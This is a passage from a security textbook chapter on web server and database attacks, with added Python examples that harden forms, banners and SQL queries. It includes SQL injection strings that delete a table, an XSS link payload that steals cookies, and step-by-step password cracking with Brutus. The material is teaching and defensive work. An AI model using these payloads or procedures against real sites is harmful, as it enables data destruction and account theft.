default configurations
in place.

212 PART 2 A Technical Overview of Hacking

Vulnerabilities of Web Servers

Web servers have a lot of the same vulnerabilities as any other servers — plus all
the vulnerabilities associated with hosting content. Web servers can be the only face
of companies that have no traditional locations (for example, Amazon and eBay),
so you must have a thorough understanding of the vulnerabilities that are present
in this medium.

Improper or Poor Web Design

A potentially dangerous vulnerability seen in Web site design is what you aren’t supposed
to see. Specifically, the comments and hidden tags that are placed in a Web page by the
Web designer. These items aren’t designed to be displayed in the browser, but a savvy
attacker can observe these items by viewing the source code of the page:

<form method="post" action="../../cgi-bin/formMail.pl">
<!-- Regular FormMail options -->
<input type=hidden name="recipient" value="someone@someplace.com">
<input type=hidden name="subject" value="Message from website visitor">
<input type=hidden name="required" value="Name,Email,Address1,City,State,Zip,Phone1">
<input type=hidden name="redirect" value="http://www.someplace.com/received.htm">
<input type=hidden name="server_name" value="https://payments.someplace.com">
<input type=hidden name="env_report" value="REMOTE_HOST,HTTP_USER_AGENT">
<input type=hidden name="title" value="Form Results">
<input type=hidden name="return_link_url" value="http://www.someplace.com/main.html">
<input type=hidden name="return_link_title" value="Back to Main Page">
<input type=hidden name="missing_fields_redirect" value="http://www.someplace.com/error.html">
<input type=hidden name="order_confirmation" value="orders@someplace.com">
<input type=hidden name="cc" value="j.halak@someplace.com">
<input type=hidden name="bcc" value="c.price@someplace.com">
<!-- Courtesy Reply Options -->

When looking at the code, there is some information that is useful to an attacker.
While the information may not be completely actionable as far as something that can
be attacked, it does give us something. In the code, notice the presence of e-mail addresses
and even the presence of what appears to be a payment processing server (https://
payments.someplace.com). This is information that an attacker may use to target
an attack.


The following is another example of a vulnerability in code that can be exploited:

<FORM ACTION="http://111.111.111.111/cgi-bin/order.pl" method="post">
<input type=hidden name="price" value="6000.00">
<input type=hidden name="prd_id" value="X190">

QUANTITY: <input type=text name="quant" size=3 maxlength=3 value=1>

In this example, the Web designer has decided to use hidden fields
to hold the price of an item. Unscrupulous attackers could change
the price of the item from $6,000.00 to $60.00 and make their
own discount.
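The hidden-price form above, handled two ways, as an added example that is not the book’s code: the first handler trusts the hidden field the way the book describes, the second ignores it and prices the order from a server-side catalogue. The catalogue, the handler names and the two submitted orders are constructed here; product X190 and the $6,000.00 and $60.00 figures come from the text.

```python
"""Hidden-field price manipulation: the trusting handler beside a hardened one.

Added example. The catalogue, the order dictionaries and the function names are
constructed here and are not the book's code.
"""
from decimal import Decimal


# Constructed server-side catalogue: the only place a price should come from.
CATALOG = {"X190": Decimal("6000.00")}


class OrderError(ValueError):
    """Raised when a submitted order fails validation."""


def total_trusting_hidden_field(form):
    """The design the book warns about: the price is read back from the hidden
    'price' field, so whoever submits the form decides what the item costs."""
    price = Decimal(form["price"])
    return price * int(form["quant"])


def total_from_catalog(form):
    """Hardened handler: the client only identifies the product and the
    quantity; the price is looked up server side and any submitted 'price'
    field is ignored entirely."""
    prd_id = form.get("prd_id", "")
    if prd_id not in CATALOG:
        raise OrderError("unknown product id")
    try:
        quant = int(form.get("quant", ""))
    except ValueError:
        raise OrderError("quantity must be an integer") from None
    # size=3 / maxlength=3 on the form only advises the browser; the server
    # has to enforce the range itself because the form can be edited.
    if not 1 <= quant <= 999:
        raise OrderError("quantity out of range")
    return CATALOG[prd_id] * quant


# Constructed submissions: the form as designed, and the same form after the
# visitor has edited the hidden price field in the saved page source.
HONEST_ORDER = {"price": "6000.00", "prd_id": "X190", "quant": "1"}
TAMPERED_ORDER = {"price": "60.00", "prd_id": "X190", "quant": "1"}

if __name__ == "__main__":
    for label, order in (("honest", HONEST_ORDER), ("tampered", TAMPERED_ORDER)):
        print(label, "trusting:", total_trusting_hidden_field(order),
              "catalog:", total_from_catalog(order))
```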

Buffer Overflow

A common vulnerability in Web servers, and all software, is the
buffer overflow. A buffer overflow occurs when an application,
process, or program attempts to put more data in a buffer than
it was designed to hold. In practice, buffers should hold only
a specific amount of data and no more. In the case of a buffer
overflow, a programmer, either through lazy coding or other
practices, creates a buffer in code, but does not put restrictions on
it. Much like too much water poured into an ice cube tray, the delta
must go someplace, which in this case means adjacent buffers.
When data spills or overflows into the buffers it was not intended
for, the result can be corrupted or overwritten data. In practice,
if this act occurs, the result can be that data loses its integrity.
In extreme cases, buffer overwriting can lead to anything from
a loss of system integrity to the disclosure of information to
unauthorized parties.

NOTE

Comments are not a bad thing to have in code; in fact,
they are a good thing to have when developing an
application and should be
retained in the original source
code. Code that is published into
a public area such as a Web site
should have them removed or sanitized.

NOTE

Buffer overflows are not
exclusive to Web servers, Web
applications, or any application;
they can be encountered in any
piece of code that you may use.

Denial of Service (DoS) Attack

An attack that can wreak havoc with a Web server is the venerable DoS attack. As a fixed
asset, a Web server is vulnerable to this attack much as any other server-based asset would
be. When carried out against a Web server, all the resources on a Web server can be rapidly
consumed, slowing down the performance of a server. A DoS is mostly considered an annoyance due to the ease with which it can be defeated.

Distributed Denial of Service (DDoS) Attack

Where a DoS attack is mostly an annoyance, the distributed denial of service (DDoS) attack is much more of a problem. A DDoS accomplishes the same goal as a DoS: to consume all the resources on a server and prevent it from being used by legitimate users. The difference between a DDoS and a DoS is scale, using the concept of economy of scale. In a DDoS, many more systems are used to attack a target, crushing it under the weight of multiple requests at once. In some cases, the attack can be launched from thousands of servers at once against a target.

Some of the more common DDoS attacks include:

• Ping flooding attack — A computer sends a ping to another system with the intention of uncovering information about the system. This attack can be scaled up so that the packets being sent to a target will force the system to go offline or suffer slowdowns.

• Smurf attack — Similar to the ping flood attack, but with a twist to the process. In a Smurf attack, a ping command is sent to an intermediate network where it is amplified and forwarded to the victim. This single ping now becomes a virtual tsunami of traffic.

• SYN flooding — The equivalent of sending a letter that requires a return receipt; however, the return address is bogus. If a return receipt is required and the return address is bogus, the receipt will go nowhere, and a system waiting for confirmation will be left in limbo for some period of time. An attacker that sends enough SYN requests to a system can use all the connections on a system so that nothing else can get through.
• IP fragmentation/fragmentation attack — Requires an attacker to use advanced knowledge of the Transmission Control Protocol/Internet Protocol (TCP/IP) suite to break packets up into “fragments” that can bypass most intrusion-detection systems. In extreme cases, this type of attack can cause hangs, lock-ups, reboots, blue screens, and other mischief.

Banner Information

A banner can reveal a wealth of information about a Web server for those who know how to retrieve it. Using a piece of software such as Telnet or PuTTY, it is possible to retrieve this information about a server. What’s in a banner? The following code illustrates what is returned from a banner:

HTTP/1.1 200 OK
Server: <web server name and version>
Content-Location: http://192.168.100.100/index.htm
Date: Wed, 12 May 2010 14:03:52 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Wed, 12 May 2010 18:56:06 GMT
ETag: "067d136a639be1:15b6"
Content-Length: 4325

This header, which is easy to obtain, reveals information about the server that is being targeted. Web servers can have this information sanitized, but the webmaster must actually make the effort to do so. This information can be returned quite easily from a Web server using the following command:

telnet www.<servername>.com 80

NOTE

When you make a request for content to a Web server, a piece of information known as a content location header is prefixed to the response. With most Web servers this header provides information such as IP address, fully qualified domain name (FQDN), and other data.

Permissions

Permissions control access to the server and the content on it, but the problem is they can easily be incorrectly configured. Incorrectly assigned permissions have the potential to allow access to locations on the Web server that should not be accessible.
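A check a webmaster can run over a captured response head to see whether the banner and Content-Location disclosures described in the Banner Information section are still present. This is an added example, not the book’s code; both response heads are constructed here (the version string stands in for the “<web server name and version>” placeholder) and the function names are assumptions.

```python
"""Flag version and address disclosure in an HTTP response head.

Added example; the two response heads are constructed from the book's banner
listing and are not captured from a real server.
"""
import ipaddress
import re
from urllib.parse import urlsplit

# Constructed from the book's banner; "Example-HTTPD/2.4.1" is a placeholder
# for whatever a real server would put in the Server header.
VERBOSE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Example-HTTPD/2.4.1\r\n"
    "Content-Location: http://192.168.100.100/index.htm\r\n"
    "Date: Wed, 12 May 2010 14:03:52 GMT\r\n"
    "Content-Type: text/html\r\n"
    "Accept-Ranges: bytes\r\n"
    "Last-Modified: Wed, 12 May 2010 18:56:06 GMT\r\n"
    "ETag: \"067d136a639be1:15b6\"\r\n"
    "Content-Length: 4325\r\n"
    "\r\n"
)

# The same response after the webmaster has made the effort the book asks for:
# a generic Server value and no Content-Location at all (constructed).
SANITIZED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: webserver\r\n"
    "Date: Wed, 12 May 2010 14:03:52 GMT\r\n"
    "Content-Type: text/html\r\n"
    "Content-Length: 4325\r\n"
    "\r\n"
)


def parse_head(raw):
    """Split a raw response head into (status line, {name: value}). Header
    names are case-insensitive, so they are stored lower-cased."""
    head = raw.split("\r\n\r\n", 1)[0]
    status, *lines = head.split("\r\n")
    headers = {}
    for line in lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return status, headers


def banner_findings(raw):
    """Return the disclosures found in a response head; an empty list is clean."""
    findings = []
    _, headers = parse_head(raw)
    server = headers.get("server", "")
    if re.search(r"\d", server):  # a digit in the banner almost always means a version
        findings.append("Server header reveals software version: " + server)
    location = headers.get("content-location", "")
    host = urlsplit(location).hostname if location else None
    if host:
        try:
            addr = ipaddress.ip_address(host)
        except ValueError:
            findings.append("Content-Location reveals host name: " + host)
        else:
            kind = "internal" if addr.is_private else "public"
            findings.append("Content-Location reveals %s IP address: %s" % (kind, host))
    return findings


if __name__ == "__main__":
    for label, raw in (("verbose", VERBOSE_RESPONSE), ("sanitized", SANITIZED_RESPONSE)):
        print(label + ":", banner_findings(raw) or ["no disclosures"])
```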
Error Messages

While they might not seem like a problem, error messages can be a potential vulnerability as well, giving vital information to an attacker. Error messages like 404, for example, tell a visitor that content is not available or located on the server. However, there are plenty of other error messages that can be given, each giving different types of information, from the very detailed to the very obscure. Table 9-1 displays error messages that may be displayed in a Web browser or Web application when a connection is attempted to a Web server or service. The messages in Table 9-1 come directly from Microsoft’s development database.

Unnecessary Features

Servers should be purpose-built to the role they will fill in the organization; anything not essential to this role should be eliminated. This process, known as hardening, will get rid of the features, services, and applications that are not necessary for the system to do its appointed job.

NOTE

Banners can be changed in most Web servers to varying degrees to meet the designer or developer’s goals. You should become familiar with your Web application or server to see what you can configure and what is practical to do.

NOTE

Permissions should always be carefully assigned, configured, and managed. Even better, permissions should always be documented to ensure that the proper ones are in place.

NOTE

Error messages should be configured to be descriptive when doing development and testing, but when deployed into a production environment they should be sanitized.

NOTE

Everything that is running on a system — such as a service, application, or process — is running something that can be targeted and exploited by an attacker.

Table 9-1  Partial list of IIS 6.0 messages.

MESSAGE NUMBER   DESCRIPTION
400              Cannot resolve the request.
401.1            Unauthorized: Access is denied due to invalid credentials.
401.2            Unauthorized: Access is denied due to server configuration favoring an alternate authentication method.
401.3            Unauthorized: Access is denied due to an ACL set on the requested resource.
401.4            Unauthorized: Authorization failed by a filter installed on the Web server.
401.5            Unauthorized: Authorization failed by an ISAPI/CGI application.
401.7            Unauthorized: Access denied by URL authorization policy on the Web server.
403              Forbidden: Access is denied.
403.1            Forbidden: Execute access is denied.
403.2            Forbidden: Read access is denied.
403.3            Forbidden: Write access is denied.
403.4            Forbidden: SSL is required to view this resource.
403.5            Forbidden: SSL 128 is required to view this resource.
403.6            Forbidden: IP address of the client has been rejected.
403.7            Forbidden: SSL client certificate is required.
403.8            Forbidden: DNS name of the client is rejected.
403.9            Forbidden: Too many clients are trying to connect to the Web server.
403.10           Forbidden: Web server is configured to deny Execute access.
403.11           Forbidden: Password has been changed.

TIP

Remember that discovering the default accounts in an operating system or environment is very easy because the system vendor generally has these details listed on its Web site.

User Accounts

Most operating systems come preconfigured with a number of user accounts and groups already in place. These accounts can easily be discovered through a little research on an attacker’s part. These accounts can be used to gain access to the system in ways that can be used for no good.

Structured Query Language (SQL) Injections

Structured Query Language (SQL) injections are designed to exploit applications that solicit the client to supply data that is processed in the form of SQL statements. An attacker forces the SQL engine into executing commands unintended by the creator by supplying specially crafted input. These commands force the application to reveal information that is restricted.
• SQL injections are an exploit in which the attacker “injects” SQL code into an input box or form with the goal of gaining unauthorized access or altering data.

• Can be used to inject SQL commands to exploit non-validated input vulnerabilities in a Web app database.

• Can be used to execute arbitrary SQL commands through a Web application.

Examining an SQL Injection

SQL injections require considerable skill to execute, but the effects can be dramatic. Simply put, SQL injections are designed to exploit “holes” in the application. If an attacker has the appropriate knowledge of the SQL language, such an attack can yield a tremendous amount of access to the database on the Web site and the Web applications that rely on it. So what are the tools you will need to perform an SQL injection? Not much in the scheme of things:

• Web browser
• Knowledge of SQL
• Lack of input validation

The environment and platform affected can be:

• Language — SQL
• Platform — Any

SQL injections are common and serious issues with any Web site that uses a database as its back end. Those with the correct knowledge can easily detect and exploit flaws. Since a large number of Web sites use databases as their back end to provide a rich experience to the visitor, the potential for a Web site to be affected by this attack is possible on even small-scale sites. Essentially, an SQL injection is carried out by placing special characters into existing SQL commands and modifying the behavior to achieve the attacker’s desired result.

NOTE

Structured Query Language (SQL) is a language used to interact with databases. Using SQL it is possible to access, manipulate, and change data in databases to differing degrees. The language is not designed for any specific vendor’s database, though some vendors have added their own customizations, and is commonly used in large database systems.
NOTE

To be effective, an SQL injection does require a level of knowledge and comfort with the SQL language. However, browsers such as Mozilla Firefox do offer add-ons that make the level of knowledge required less than it used to be. Other plugins that are available can assist in the process of locating weaknesses in a Web site or Web application, giving the attacker the ability to target their attack.

The following example illustrates an SQL injection in action and how it is carried out. This example also illustrates the impact of introducing different values into an SQL query. In the following example, after an attacker with the username “kirk” inputs the string 'name'; DELETE FROM items;-- for itemName, the query becomes the following two queries:

SELECT * FROM items WHERE owner = 'kirk' AND itemname = 'name'; DELETE FROM items; --'

Several of the well-known database products such as Microsoft’s SQL Server and Siebel allow multiple SQL statements separated by semicolons to be executed at once. This technique is formally known as batch execution and allows an attacker to execute multiple arbitrary commands against a database. In other databases this technique will generate an error and fail, so knowing the database you are attacking is essential.

If an attacker enters the string 'name'; DELETE FROM items; SELECT * FROM items WHERE 'a' = 'a';, the following three valid statements will be created:

SELECT * FROM items WHERE owner = 'kirk' AND itemname = 'name'; DELETE FROM items; SELECT * FROM items WHERE 'a' = 'a';

TIP

Take special note of the last two characters, which are two hyphens (--). These characters are significant as they tell the database to treat everything following as a comment and therefore not executable. In the event that this query was modified, anything in the original query following the hyphens would now be ignored and everything prior would be executed.

A good way to prevent SQL injection attacks is to use input validation, which ensures that only approved characters are accepted. Use whitelists, which dictate safe characters, and blacklists, which dictate unsafe characters.

Vandalizing Web Servers

Web servers are the targets of numerous types of attacks, but one of the most common attacks is the act of vandalism known as defacement. Defacing a Web site can be aggressive or very subtle, depending on the goals of the attacker, but in either case the goals are the same: to embarrass the company, make a statement, or just be a nuisance. In order to actually deface a Web site, it is possible to use a number of methods, depending on the attacker’s own skill level, capabilities, and opportunities available. Any of the following methods may be used:

• Credentials through man-in-the-middle attacks
• Password brute force of the Administrator account
• FTP server exploits
• Web server bugs
• Web folders
• Incorrectly assigned or configured permissions
• SQL injection
• URL poisoning
• Web server extension exploits
• Remote service exploits

Let’s take a look at some of the more common ways of attacking a Web server and the sites hosted on them.

Input Validation

Developers of Web applications have traditionally been less than careful regarding the type of input they will accept. In most cases, a user entering data into a form or Web site will have few if any restrictions placed upon them when he or she enters data. When data is accepted without restriction, mistakes both intentional and unintentional will be entered into the system and can lead to problems later on, such as the following:

• System crashes
• Database manipulation
• Database corruption
• Buffer overflows
• Inconsistent data

A good example of input validation, or rather the lack of it, is a box on a form where a phone number is to be entered, but actually any form of data will be accepted.
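The SQL injection from the previous section and the phone-number box just mentioned, handled in one constructed form handler as an added example that is not the book’s code: whitelist validation for the phone field, a parameterized query beside the concatenated one the injection string breaks, and HTML escaping for a name that is echoed back to the visitor (the failure the cross-site scripting section that follows describes). The items table and its rows, the function names and the phone format are assumptions, and SQLite’s executescript() stands in for the batch execution the book attributes to SQL Server.

```python
"""Input validation, parameterized SQL and output escaping for the form inputs
the book's examples attack.

Added example. The items table, its rows, the handler functions and the phone
format are constructed here and are not the book's code.
"""
import html
import re
import sqlite3

# Whitelist for the phone box: only NNN-NNN-NNNN passes. A constructed North
# American shape; use whatever shape your application actually expects.
PHONE_RE = re.compile(r"\d{3}-\d{3}-\d{4}")

# The book's injection string and XSS payload, as the attacker would type them.
INJECTION = "name'; DELETE FROM items; --"
SCRIPT_NAME = "<script>evilScript()</script>"


def fresh_db():
    """Constructed items table: two owners, three items, in memory."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE items (owner TEXT, itemname TEXT)")
    db.executemany("INSERT INTO items VALUES (?, ?)",
                   [("kirk", "name"), ("kirk", "phaser"), ("spock", "tricorder")])
    db.commit()
    return db


def item_count(db):
    return db.execute("SELECT COUNT(*) FROM items").fetchone()[0]


def run_concatenated_lookup(db, owner, itemname):
    """The pattern the book's example attacks: user input pasted straight into
    the SQL text. executescript() runs every statement in the string, as a
    batch-executing server would, so the injected DELETE runs as a second
    statement and the trailing -- comments out the closing quote. Returns the
    number of rows left afterwards so the damage is visible."""
    sql = ("SELECT * FROM items WHERE owner = '%s' AND itemname = '%s';"
           % (owner, itemname))
    db.executescript(sql)
    return item_count(db)


def lookup_parameterized(db, owner, itemname):
    """Hardened: placeholders let the driver bind the values, so the quote,
    semicolon and DELETE in the input are only characters in a string."""
    return db.execute("SELECT * FROM items WHERE owner = ? AND itemname = ?",
                      (owner, itemname)).fetchall()


def validate_phone(value):
    """Whitelist validation for the phone box: reject anything that is not
    exactly the expected shape rather than hunting for bad characters."""
    if not PHONE_RE.fullmatch(value):
        raise ValueError("phone number must look like 555-123-4567")
    return value


def render_greeting(name):
    """Reflect the name parameter as the HYRULE page does, but escaped, so a
    <script> tag reaches the browser as text rather than markup."""
    return "Welcome Back! " + html.escape(name)


if __name__ == "__main__":
    db = fresh_db()
    print("concatenated query: rows left =", run_concatenated_lookup(db, "kirk", INJECTION))
    db = fresh_db()
    print("parameterized query: matches =", lookup_parameterized(db, "kirk", INJECTION),
          "rows left =", item_count(db))
    print(render_greeting(SCRIPT_NAME))
```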
In some cases, taking the wrong data will simply mean that the information may be unusable to the owner of the site, but it could cause the site to crash or mishandle the information to reveal information onscreen.

NOTE

Always ask what type of data you are expecting in an application (such as a form) and make sure that this is the only type of data that is accepted.

Cross-Site Scripting (XSS)

Another type of attack against a Web server is the cross-site scripting (XSS) attack. It relies on a variation of the input validation attack, but the target is different because the goal is to go after a user instead of the application or data. An example of an XSS uses scripting methods to execute a Trojan with a target’s Web browser; this would be made possible through the use of scripting languages such as JavaScript or VBScript. By careful analysis, an attacker can look for ways to inject malicious code into Web pages in order to gain information from session info on the browser, to elevated access, to content in the browser.

XSS in Action

1. The attacker discovers that the HYRULE Web site suffers from an XSS scripting defect.
2. An attacker sends an e-mail stating that the victim has just been awarded a prize and should collect it by clicking a link in the e-mail.
3. The link in the e-mail goes to http://www.hyrule.com/default.asp?name=<script>badgoal()</script>.
4. When the link is clicked, the Web site displays the message “Welcome Back!” with a prompt to enter the name.
5. The Web site has read the name from your browser via the link in the e-mail. When the link was clicked in the e-mail, the HYRULE Web site was told your name is <script>evilScript()</script>.
6. The Web server reports the “name” and returns it to the victim’s browser.
7. The browser correctly interprets this as script and runs the script.
8. This script instructs the browser to send a cookie containing some information to the attacker’s system, which it does.

Most modern Web browsers contain protection against XSS, but this does not mean the user is entirely safe.

Anatomy of Web Applications

Web applications have become more popular in recent years, with companies deploying more of this class of software application. Applications such as Microsoft SharePoint, Moodle, and others have been deployed for all sorts of reasons, ranging from organization of data to simplified customer access. Applications in this category are typically designed to be accessed from a Web browser or similar client application that uses the HTTP protocol to exchange information between the client and server. Software in this category can be written in any number of development languages, including Java or ActiveX. Web applications can be constructed with a variety of application platforms, such as BEA WebLogic, ColdFusion, IBM WebSphere, Microsoft .NET, and Sun JAVA technologies.

Exploitative behaviors:

• Theft of information such as credit cards or other sensitive data
• The ability to update application and site content
• Server-side scripting exploits
• Buffer overflows
• Domain Name Server (DNS) attacks
• Destruction of data

Making Web applications even more of a concern to the security professional is the fact that many Web applications are dependent on a database. Web applications will hold information such as configuration information, business rules and logic, and customer data. Using attacks such as SQL injections, an attacker can compromise a Web application and then reveal or manipulate data in ways that an owner may not have envisioned, much less intended. Common vulnerabilities with Web applications tend to be somewhat specific to the environment, including factors such as operating system, application, and user base.
With all these factors in mind, it can be said that Web application vulnerabilities can be roughly confined to the following categories:

• Authentication issues
• Authorization configuration
• Session management issues
• Input validation
• Encryption strength and implementation
• Environment-specific problems

Insecure Logon Systems

If a Web application requires a user to log on prior to gaining access to the information in an application, this logon must be handled securely. An application that handles logons must be designed to properly handle invalid logons and passwords. Care must be taken that the incorrect or improper entry of information does not reveal information that an attacker could use to gain additional information about a system. An example of this situation is shown in Figure 9-1. Applications can track information relating to improper or incorrect logons by users if so enabled. Typically, this information comes in log form with entries listing items such as:

• Entry of an invalid user ID with a valid password
• Entry of a valid user ID with an invalid password
• Entry of an invalid user ID and password

Applications should be designed to return very generic information that does not reveal information such as correct usernames. Web apps that return messages such as “username invalid” or “password invalid” can give an attacker a target to focus on — such as a correct password.

Figure 9-1  Revealing error message. (Screen text: “This user is not active. Contact your system administrator.” with a “Return to Login page” link.)

One tool designed to uncover and crack passwords for Web applications and Web sites is a utility known as Brutus. Brutus is not a new tool but it does demonstrate one weapon that the attacker has to uncover passwords for Web sites and applications. Brutus is a password cracker that is designed to decode different password types present in Web applications. The utility is designed for use by the security professional for testing and evaluation purposes, but an attacker can use it as well. Brutus is as simple to use as are most tools in this category. The attack or cracking process using Brutus proceeds as follows:

• Enter the IP address into the Target field in Brutus. This is the IP address of the server on which the password is intended to be broken.
• Select the type of password crack to perform in the Type field. Brutus has the ability to crack passwords in HTTP, FTP, POP3, and NetBus.
• Enter the port over which to crack the password.
• Configure the Authentication Options for the system. If the system does not require a username or uses only a password or PIN number, choose the Use Username option. For known usernames, the Single User option may be used and the username entered in the box below it.
• Set the Pass Mode and Pass File options. Brutus has the option to run the password crack against a dictionary word list.
• At this point, the password-cracking process can begin; once Brutus has cracked the password, the Positive Authentication field will display it.

Again, Brutus is not the newest password cracker in this category, but it is well known and effective. Other crackers in this category include THC Hydra.

Scripting Errors

Web applications, programs, and code such as Common Gateway Interface (CGI), ASP.NET, and JavaServer Pages (JSP) are commonly in use in Web applications and present their own issues. Using methods such as SQL injections and lack of input validation, scripts can be a liability if not managed or created correctly. A savvy attacker can use a number of methods to cause grief to the administrator of a Web application, including the following:

• Upload bombing — Upload bombing uploads masses of files to a server with the goal of filling up the hard drive on the server. Once the hard drive of the server is filled, the application will cease to function and crash.
• Poison null byte attack — A poison null byte attack passes special characters that the scripts may not be designed to handle properly. When this is done, the script may grant access where it should not otherwise be given.

• Default scripts — Default scripts are uploaded to servers by Web designers who do not know what they do at a fundamental level. In such cases, an attacker can analyze or exploit configuration issues with the scripts and gain unauthorized access to a system.

• Sample scripts — Web applications may include sample content and scripts that are regularly left in place on servers. In such situations, these scripts may be used by an attacker to carry out mischief.

• Poorly written or questionable scripts — Some scripts have appeared that include information such as usernames and passwords, potentially letting an attacker view the contents of the script and read these credentials.

Session Management Issues

A session represents the connection that a client has with the server application. The session information that is maintained between client and server is important and can give an attacker access to confidential information if compromised. Ideally a session will have a unique identifier, encryption, and other parameters assigned every time a new connection between client and server is created. After the session is exited, closed, or not needed, the information is discarded and not used again (or at least not used for an extended period of time), but this is not always the case. Some vulnerabilities of this type include:

• Long-lived sessions — Sessions between client and server should remain valid only for the length of time they are needed and then be discarded. Sessions that remain valid for periods longer than they are needed allow attackers using attacks such as XSS to retrieve session identifiers and reuse a session.

• Logout features — Applications should provide a logout feature that allows a visitor to log out and close a session without closing the browser.

• Insecure or weak session identifiers — Session IDs that are easily predicted or guessed can be used by an attacker to retrieve or use sessions that should be closed. Some flaws in Web applications can lead to the reuse of session IDs.

• Granting session IDs to unauthorized users — Sometimes applications grant session IDs to unauthenticated users and redirect them to a logout page. This can give the attacker the ability to request valid URLs.

• Poor or lack of password change controls — An improperly implemented or insecure password change system, in which the old password is not required, allows a hacker to change passwords of other users.

• Inclusion of unprotected information in cookies — Information such as the internal IP address of a server can be used by a hacker to ascertain more about the nature of the Web application.

Encryption Weaknesses

In Web applications, encryption plays a vital role because sensitive information is frequently exchanged between client and server in the form of logons or other types of information. When working on securing Web applications, you must consider the safety of information at two stages: when it is being stored and when it is transmitted. Both stages are potential areas for attack and must be considered thoroughly by the security professional. When considering encryption and its impact on the application, the following are areas of concern:

• Weak ciphers — Weak ciphers or encoding algorithms are those that use short keys or are poorly designed and implemented. Use of such weak ciphers can allow an attacker to decrypt data easily and gain unauthorized access to the information.
• Vulnerable software — Some software implementations that encrypt the transmission of data, such as Secure Sockets Layer (SSL), may suffer from poor programming, and as such become vulnerable to attacks such as buffer overflows.

Some tools and resources are available that can help in assessing the security of Web applications and their associated encryption strategies:

• OpenSSL, an open source toolkit used to implement the SSLv3 and TLSv1 protocols: http://www.openssl.org
• The OWASP guide to common cryptographic flaws: http://www.owasp.org
• Nessus, a security scanner that can list the ciphers in use by a Web server: http://www.nessus.org
• WinSSLMiM, which can be used to perform an HTTPS man-in-the-middle attack: http://www.securiteinfo.com/outils/WinSSLMiM.shtml
• Stunnel, a program that allows the encryption of non-SSL-aware protocols: http://www.stunnel.org

Database Vulnerabilities

One of the most attractive targets for an attacker is the database that contains the information about the site or application. Databases represent the “holy grail” to an attacker due to the information within them: configuration information, application data, and other data of all shapes and sizes. An attacker that can locate a vulnerable database will find it a very tempting target to pursue and may very well do so. The role of databases as the heart of a number of Web applications is well known and very common. Databases lie at the heart of many well-known Web applications such as Microsoft’s SharePoint and other similar technologies. In fact, a majority of Web applications would not function without a database as their back end.

NOTE

Databases of any type can be vulnerable for any number of reasons no matter how secure or “unhackable” the vendor espouses them to be.
Vulnerabilities will vary depending on the particular technology and deployment that is in use, but in every case the vulnerabilities are there.

CHAPTER 9 Web and Database Attacks 225

A Look at Databases

For all its power and complexities, a database can be boiled down into a very simple concept: it is a hierarchical, structured format for storing information for later retrieval, modification, management, and other purposes. The types of information that can be stored within this format vary wildly, but the concept is still the same: storage and retrieval. In the database world, databases are typically categorized based on how they store their data. These organizational types are:

• Relational database — With a relational database, data can be organized and accessed in different ways as appropriate for the situation. For example, a data set containing all the customer orders can be grouped by the Zip code in which the transaction occurred, by the sale price, by the buyer’s company name, and so on.
• Distributed database — A distributed database is designed to be dispersed or replicated between different locations across a network.
• Object-oriented programming database — An object-oriented programming database is built around data-defined object classes and subclasses.

Within a database there are several structures designed to organize and structure information. Each structure allows the data to be easily managed, queried, and retrieved:

• Record — Each record in a database represents a collection of related data, such as information about a person.
• Column — Represents one type of data, for example, age data for each person in the database.
• Row — One line of data in a database.

In order to work with the data in a database, a special language is used.
Structured Query Language (SQL) is a standard language for making interactive queries from and updating a database such as IBM DB2, Microsoft Access, and database products from Oracle, Sybase, and Computer Associates. Databases have a broad range of applications for everything from storing simple customer data to storing payment and customer information. For example, in an e-commerce application, when customers place an order their payment and address information will be stored within a database that resides on a server.

While the function of databases may sound mundane, databases really come into their own when linked into a Web application. A database linked as part of a Web application can make a Web site and its content much easier to maintain and manage. For example, if you use a technology such as ASP.NET, you can modify a Web site’s content simply by editing a record in a database. With this linkage, simply changing a record in a database will trigger a change in any associated pages or other areas. Another very common use of databases, and one of the higher-profile targets, is in membership or member registration sites.

NOTE
SQL was developed by IBM in the early 1970s and has evolved considerably since then. In fact, SQL is the de facto language of databases and is used by systems such as Oracle, Siebel, Access, and Microsoft SQL Server.

NOTE
While the database changes from server to server and application to application, the actual concept is the same. The finer details of every database will not be discussed because this would be impossible, but you can learn the broad details that will apply to just about every database.

NOTE
Of course, the process of actually linking a database to a Web application or page is much more complex than detailed here, but the process is essentially the same no matter the technology.
In these types of sites, information about visitors who register with the site is stored within a database. This can be used for a discussion forum, chat room, or many other applications. With potentially large amounts of personal information being stored, an attacker would find this setup ideal for obtaining valuable information. In essence, a database hosted on a Web server behaves as a database resident on a computer: it is used to store, organize, and transmit data.

Vulnerabilities

Databases can have a myriad of vulnerabilities that leave them susceptible to attack. These vulnerabilities are as varied as the environments the technologies are deployed into. Vulnerabilities include misconfiguration, lack of training, buffer overflows, forgotten options, and other details lurking in the wings waiting for an attacker.

Before you can uncover the vulnerabilities in databases it is necessary to know what type of databases you have and where they reside. Databases can be easily missed because they may be installed as part of another application or just not reported by the application owner. For example, a product manufactured by Microsoft known as SQL Server Express is a small, free piece of software that is part of various applications that a typical user may install. As such, this database may go unreported by users who are unaware of the security issues involved.

NOTE
Network and security administrators often lose track of (or just don’t know about) database servers on their network. While larger databases are more than likely to be on the administrator’s radar, smaller ones that get bundled in with other applications can easily be overlooked.

Locating Databases on the Network

A tool that is very effective at locating these “rogue” or unknown installations is a tool known as SQLPing 3.0.
The description of this tool from the vendor’s Web site describes the product: “SQLPing 3.0 performs both active and passive scans of your network in order to identify all of the SQL Server/MSDE installations in your enterprise. Due to the proliferation of personal firewalls, inconsistent network library configurations, and multiple-instance support, SQL Server installations are becoming increasingly difficult to discover, assess, and maintain. SQLPing 3.0 is designed to remedy this problem by combining all known means of SQL Server/MSDE discovery into a single tool which can be used to ferret out servers you never knew existed on your network so you can properly secure them.” A screenshot from SQLPing 3.0 is shown in Figure 9-2.

FIGURE 9-2 SQLPing 3.0 interface.

A cousin of SQLPing is a product known as SQLRecon. This product is very similar to SQLPing, but also employs additional techniques to discover SQL Server installations that may be hidden: “SQLRecon performs both active and passive scans of your network in order to identify all of the SQL Server/MSDE installations in your enterprise. Due to the proliferation of personal firewalls, inconsistent network library configurations, and multiple-instance support,
